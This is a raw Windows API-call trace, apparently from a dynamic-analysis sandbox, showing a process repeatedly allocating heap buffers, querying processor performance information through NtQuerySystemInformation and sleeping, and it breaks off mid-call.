[0207.506] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.506] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.507] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.507] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.508] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.509] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.515] Sleep (dwMilliseconds=0x110) [0207.541] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.541] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.542] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.542] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.542] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.542] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.542] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.542] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.542] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.542] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.542] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.543] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.550] Sleep (dwMilliseconds=0x110) [0207.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.567] Sleep (dwMilliseconds=0x110) [0207.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.582] Sleep (dwMilliseconds=0x110) [0207.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.600] Sleep (dwMilliseconds=0x110) [0207.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.614] Sleep (dwMilliseconds=0x110) [0207.633] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.633] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.634] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.634] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.634] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.634] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.635] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.635] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.635] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.636] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.636] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.636] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.636] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.637] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.639] Sleep (dwMilliseconds=0x110) [0207.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.661] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.662] Sleep (dwMilliseconds=0x110) [0207.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.677] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.678] Sleep (dwMilliseconds=0x110) [0207.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.684] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.687] Sleep (dwMilliseconds=0x110) [0207.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.704] Sleep (dwMilliseconds=0x110) [0207.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.719] Sleep (dwMilliseconds=0x110) [0207.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.736] Sleep (dwMilliseconds=0x110) [0207.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.754] Sleep (dwMilliseconds=0x110) [0207.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, 